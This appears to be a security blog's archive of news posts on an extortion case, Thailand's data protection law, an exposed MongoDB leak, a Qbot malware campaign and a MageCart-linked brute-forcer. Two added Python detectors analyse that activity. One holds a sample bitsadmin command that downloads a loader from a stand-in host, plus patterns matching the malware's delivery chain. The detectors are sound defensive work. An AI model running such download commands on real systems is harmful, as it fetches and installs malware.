Category Archives: Personal Data

Network chief allegedly tries to extort $750,000 from former employers

After getting fired from his job as a director of infrastructure services, a Statesville (NC) man decided to try to extort his former employers by threatening to release customers’ private information to the public.

Court papers don’t name the company Matthew Moebius worked for, but they do say he worked there for 13 years, according to wsoctv.com. According to the filings, Moebius served as director of network infrastructure services for the company until his untimely departure in 2014. The reason for his firing also isn’t mentioned.

As the story goes, after getting canned, a disgruntled Moebius used an overseas encrypted email service to threaten senior executives with the release of customers’ private information. In exchange for not doing so, Moebius allegedly demanded $750,000 from his former employers.

According to court papers, one of Moebius’s messages said, “Sorry to interrupt your boy scout canoeing trip. Reply or this goes to the next level now. You have no idea how much customer data will go to the internet, but you will if you delay. Name any client and get a data file in return.”

His threats fell on deaf ears, so a month later he emailed three company executives and included personally identifiable information for three customers.

“To Internet CC [company] customers or not. Keep [expletive] around and be destroyed. This is a tiny sample,” this email reportedly said.

Charged with extortion and identity theft, Moebius pleaded not guilty and requested that his case go to trial.

HOTforSecurity

Thailand’s National Legislative Assembly Passes Data Protection Law

On February 28, 2019, Thailand’s National Legislative Assembly finally approved and endorsed the draft Personal Data Protection Act (the “PDPA”), which will now be submitted for royal endorsement and subsequent publication in the Government Gazette. Publication is anticipated to occur within the next few weeks.

The PDPA provides for a one-year grace period, such that the operative provisions concerning personal data protection, rights of data subjects, complaints, civil liabilities and penalties will take force one year after publication in the Government Gazette. The aim is to allow sufficient time for business operators to prepare and implement internal controls and systems for PDPA compliance.

In crafting the PDPA, the Thai government has largely followed and replicated the provisions of the EU General Data Protection Regulation (“GDPR”). It did so deliberately, to demonstrate that Thailand has an “adequate” level of data protection to the EU and other countries requiring the same under their own laws.

Key Requirements of the PDPA

National Data Protection Authority

A Personal Data Protection Committee will be established to enforce compliance with the PDPA.

Extraterritorial Effect

The PDPA contains provisions that have explicit extraterritorial application, which is rare for Thai law and marks a significant shift between the PDPA and Thailand’s other legal frameworks. Specifically, the PDPA will apply to the collection, use or disclosure of personal data of a data subject in Thailand that is conducted by a data controller or data processor outside of Thailand, where such processing activities relate to the offering of goods or services or the monitoring of behavior of data subjects in Thailand. (This is generally in line with the “targeting” criteria under the GDPR.) As a result, businesses that did not previously need to consider the applicability of Thai data protection law to their processing activities may now be caught within the PDPA’s territorial scope.

Operative Terms

The term “data controller” is defined as a “natural or juristic person having the power to make decision on the collection, use or disclosure of Personal Data”; “data processor” is defined as a “natural or juristic person which collects, uses or discloses personal data in accordance with the instruction of or on behalf of the data controller, provided that such person or juristic person conducting those actions is not the data controller.” The term “personal data” is defined as “information relating to a person which is identifiable, directly or indirectly, excluding the information of a dead person.”

Consent

A data subject’s consent will be required for any collection, disclosure or use of personal data.

The PDPA requires that any such consent must be express, and in writing or made through an electronic system, unless its nature does not so allow.

Sensitive Personal Data

The PDPA establishes a separate category of “sensitive personal data” that includes personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, criminal record, trade union membership, genetic data, biometric data, data concerning health or data concerning a natural person’s sex life or sexual orientation, and prohibits the collection of sensitive personal data without express consent from the data subject, except in certain prescribed circumstances (e.g., medical emergency or as required by law).

Rights of Data Subject

A data subject is entitled to request access to his or her personal data, as well as submit requests to delete, destroy or anonymize his or her personal data.

Transfer of Personal Data

A data controller is expressly prohibited from disclosing or transferring personal data to third parties, except with the data subject’s consent (subject to certain limited, customary exceptions).

Where the transfer of personal data is being made to another country or an international organization outside of Thailand, such transfer may only take place where such country or international organization has an adequate level of protection—meaning, complies with the criteria for protection of personal data to be prescribed by the Personal Data Protection Committee—except for certain limited exceptions (including specific consent from the data subject to disclose to persons in a noncompliant country).

Civil and Criminal Liability

Violation of the PDPA can lead to both civil and criminal liabilities, including administrative fines.

More Than 2 Billion Unencrypted Records Exposed in Major Email Leak

A recent security incident that began as an email leak exposed more than 2 billion records containing email addresses and other personal information.

On Feb. 25, Security Discovery came across a MongoDB instance exposed on the internet with no password protection. Security researcher Bob Diachenko peered inside the exposed resource and discovered 150 GB of data, including just under 800 million email addresses. Some of the records also included personally identifiable information (PII) such as dates of birth, gender and phone numbers.

As it turned out, the scale of the incident was much larger than originally reported. Andrew Martin, CEO and founder of DynaRisk, told SC Media UK that his company’s analysis revealed how the security incident had exposed four databases, not just one. These databases contained a total of 2,069,145,043 records, with some of the files holding employment information among other pieces of data. DynaRisk also determined that all of the records were unencrypted at the time of exposure.

A Stream of MongoDB Security Events

This isn’t the only large data breach to make headlines in 2019. Near the beginning of the year, security researcher Troy Hunt revealed how the Collection #1 breach had exposed nearly 800 million email addresses and more than 21 million passwords. Shortly thereafter, PCWorld reported that the Collection #1 data breach was part of a larger set of security incidents. With the addition of Collections #2–#5, the “Collections” breaches exposed a total of 2.19 billion records.

The incident found by Security Discovery isn’t the only one to involve an unsecured MongoDB, either. In September 2018, for instance, Diachenko revealed how an unprotected MongoDB instance had exposed 11 million records. Several months later, ZDNet found that digital attackers were still holding unsecured MongoDB databases for ransom — two years after these types of security incidents first began.

How to Defend Against a MongoDB-Based Email Leak

Security professionals can help defend their organizations’ MongoDB databases from an email leak by tailoring data encryption to fit their needs, such as by combining storage-level encryption for performance and structured data encryption on certain high-risk apps. Organizations should also implement other MongoDB security best practices, which include enabling access control and auditing system activity.

The post More Than 2 Billion Unencrypted Records Exposed in Major Email Leak appeared first on Security Intelligence.

Attack Campaign Targets Organizations Worldwide With New Qbot Banking Malware Variant

Security researchers spotted a new attack campaign that’s targeting organizations in several countries with a new variant of Qbot banking malware.

In its investigation, Varonis found the campaign consists of phishing emails carrying a ZIP attachment that contains a VBS script with a double .doc.vbs extension. Upon execution, the VBS script extracts information about the target machine’s operating system and attempts to check for strings associated with well-known antivirus software. It then uses the BITSAdmin tool to run a malware loader.

This loader, which has multiple versions signed with different digital certificates, creates a registry value, scheduled task and startup shortcut to establish persistence on the infected machine. It then launches a 32-bit explorer.exe file before injecting the main payload: a new variant of Qbot. This malware is capable of keylogging, stealing credentials/cookies from a web browser and hooking into running processes so it can latch onto users’ banking login information.
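The delivery chain above (a double-extension .doc.vbs script run by a script host, which then calls BITSAdmin to fetch the loader) lends itself to a simple process-creation detection. The following is an added example, not Varonis’s or the malware’s code; the events, paths and the hypothetical loader URL are constructed, and the document/script extension pairs beyond .doc.vbs are an assumed generalization of the same trick.

```python
"""Flag process-creation events that match the Qbot delivery chain described
above: a script host running a double-extension .doc.vbs attachment, then
bitsadmin.exe spawned by that script host to fetch the loader."""
import re

# Constructed sample events as (parent_image, image, command_line); not real logs.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\wscript.exe",
     'wscript.exe "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice_2039.doc.vbs"'),
    ("C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin /transfer job /download /priority high "
     "http://loader.example.invalid/ld.exe C:\\Users\\Public\\ld.exe"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe",
     "notepad.exe C:\\Users\\alice\\notes.txt"),
    ("C:\\Program Files\\Outlook\\outlook.exe", "C:\\Program Files\\Office\\winword.exe",
     'winword.exe "C:\\Users\\alice\\Downloads\\report.doc"'),
]

# The page reports .doc.vbs; the other document/script pairs are an assumed
# generalisation of the same double-extension trick.
DOUBLE_EXT = re.compile(r"\.(doc|docx|xls|pdf)\.(vbs|js|wsf)\b", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path):
    """Last path component, lower-cased, for case-insensitive image matching."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names an event triggers (empty if benign)."""
    parent, image, cmdline = event
    hits = []
    if basename(image) in SCRIPT_HOSTS and DOUBLE_EXT.search(cmdline):
        hits.append("double_extension_script")
    if basename(image) == "bitsadmin.exe" and basename(parent) in SCRIPT_HOSTS:
        hits.append("bitsadmin_from_script_host")
    return hits


def find_suspicious(events):
    """Index of every event with at least one hit, in log order."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


if __name__ == "__main__":
    for idx, rules in find_suspicious(SAMPLE_EVENTS):
        print(idx, rules, SAMPLE_EVENTS[idx][2])
```

Both rules firing within seconds on the same host, in that order, is the stronger signal; either alone also warrants a look at the loader's persistence artefacts (registry value, scheduled task, startup shortcut) named in the text.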

Qbot’s Adaptability in Recent Years

Varonis noted that the campaign is mostly targeting corporations located in the U.S., but it also has hit organizations around the world, including companies based in Europe, Asia and South America. Researchers analyzed the threat’s command-and-control (C&C) server and came across evidence suggesting that this Qbot campaign has already claimed thousands of victims.

This isn’t the first time Qbot has gone through some changes. For example, researchers at BAE Systems identified a variant back in April 2016 that incorporated polymorphic code, thereby making itself more difficult to detect. In November 2018, Alibaba Cloud Security uncovered a new version capable of performing brute-force attacks and enlisting infected hosts into a botnet.

How to Defend Against Banking Malware

Security professionals can help defend against banking malware like Qbot by using a unified endpoint management (UEM) platform to set up security policies and compliance rules that automate malware remediation. This step will help streamline the organization’s response capabilities in the event of a malware infection.

Additionally, security professionals should use a sophisticated anti-phishing solution that tracks which brands are under attack and uses machine learning to become proficient in evolving phishing tactics.

The post Attack Campaign Targets Organizations Worldwide With New Qbot Banking Malware Variant appeared first on Security Intelligence.

New Golang Brute-Forcer Targeting E-Commerce Sites to Steal Personal and Payment Data

Researchers discovered new Trojan malware written in Golang that’s targeting e-commerce websites with brute-force attacks.

Malwarebytes Labs recently analyzed a newly infected Magento website and found that attackers had injected malicious code into the site’s homepage so that it referenced an external piece of JavaScript. This code used a POST request to exfiltrate victims’ data to googletagmanager[.]eu when they entered their address and payment details.
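An injected skimmer of the kind described above shows up as a script tag whose source is a host the storefront never approved, here a lookalike of a legitimate tag-manager domain. The check below is an added example, not Malwarebytes’ or Magento’s code; the homepage snippet and the allow-list are constructed, and the allowed hosts are assumptions for illustration.

```python
"""Audit a storefront page's external <script src> references against an
allow-list, to surface an injected skimmer like the one described above."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allow-list for the (constructed) shop; adapt to the real storefront.
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com", "cdn.example-shop.invalid"}

# Constructed homepage fragment: two legitimate tags plus one injected tag
# pointing at the lookalike domain named in the text.
SAMPLE_HTML = """<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="https://cdn.example-shop.invalid/static/checkout.js"></script>
<script src="https://googletagmanager.eu/gtm.js"></script>
<script>var inline = 1;</script>
</head><body></body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def external_script_hosts(html):
    """Lower-cased hostnames of all script sources that carry a host part."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    hosts = (urlparse(src).hostname for src in parser.srcs)
    return [h.lower() for h in hosts if h]


def brand_label(host):
    """Second-level label, e.g. 'googletagmanager' for googletagmanager.eu."""
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else host


def audit_scripts(html, allowed):
    """(host, reason) for each script host not on the allow-list; a host that
    reuses an allowed brand label under another domain is called a lookalike."""
    allowed_labels = {brand_label(h) for h in allowed}
    findings = []
    for host in external_script_hosts(html):
        if host in allowed:
            continue
        reason = "lookalike of allowed host" if brand_label(host) in allowed_labels \
            else "not on allow-list"
        findings.append((host, reason))
    return findings
```

Running the same audit against the checkout page, where the page says the address and card fields were harvested, catches skimmers that are only injected on that step.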

In their investigation, Malwarebytes researchers found a connection between the compromised e-commerce website and a two-stage payload. The first stage consisted of a Delphi downloader detected as Trojan.Wallyshack. This threat collected basic information about the infected machine, transmitted the data to its command-and-control (C&C) server and ran Trojan.StealthWorker.GO, the second payload that communicated with the infected site. Written in Golang version 1.9, this malware sample contained several functions with the name “Brut” that it used for brute-forcing.

Connections to MageCart and the Rise of Golang Threats

While analyzing the infected website, Malwarebytes observed how this wasn’t the first time that googletagmanager[.]eu has surfaced in an attack campaign. In fact, researchers traced the domain back to criminal activities involving MageCart. This threat actor has affected more than 800 organizations by compromising their e-commerce websites and stealing customers’ payment card details, as noted by RiskIQ.

At the same time, this brute-forcer comes amid a rise of Golang-based digital threats. In January 2019, for example, Malwarebytes Labs detected Trojan.CryptoStealer.Go, an information stealer written in this budding programming language. Just a month before, researchers at Palo Alto Networks’ Unit 42 came across a Golang variant of Zebrocy, an attack tool used by the Sofacy threat group.

How Security Teams Can Defend Against Brute-Forcers

Security professionals can help defend against brute-force attacks by shielding their network perimeter against outside intrusion with firewalls and identity-based security such as identity and access management (IAM). Additionally, security teams should implement consistent software patching so they can close off known vulnerabilities.

The post New Golang Brute-Forcer Targeting E-Commerce Sites to Steal Personal and Payment Data appeared first on Security Intelligence.